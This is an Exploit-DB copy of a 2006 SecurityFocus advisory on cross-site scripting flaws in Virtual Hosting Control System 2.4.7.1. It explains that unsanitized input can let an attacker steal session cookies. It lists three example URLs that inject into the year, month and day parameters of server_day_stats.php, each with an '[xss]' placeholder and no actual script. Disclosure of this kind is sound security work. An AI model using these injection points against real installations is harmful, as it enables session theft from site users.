Virtual Hosting Control System 2.4.7.1 - 'Server_day_stats.php' Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

27799




Platform:

PHP

Date:

2006-05-02


source: https://www.securityfocus.com/bid/17790/info

Virtual Hosting Control System is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. 

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/admin/server_day_stats.php?year=2006&month=05&day=2[xss]
http://www.example.com/admin/server_day_stats.php?year=2006&month=05[xss]&day=2
http://www.example.com/admin/server_day_stats.php?year=2006[xss]&month=05&day=2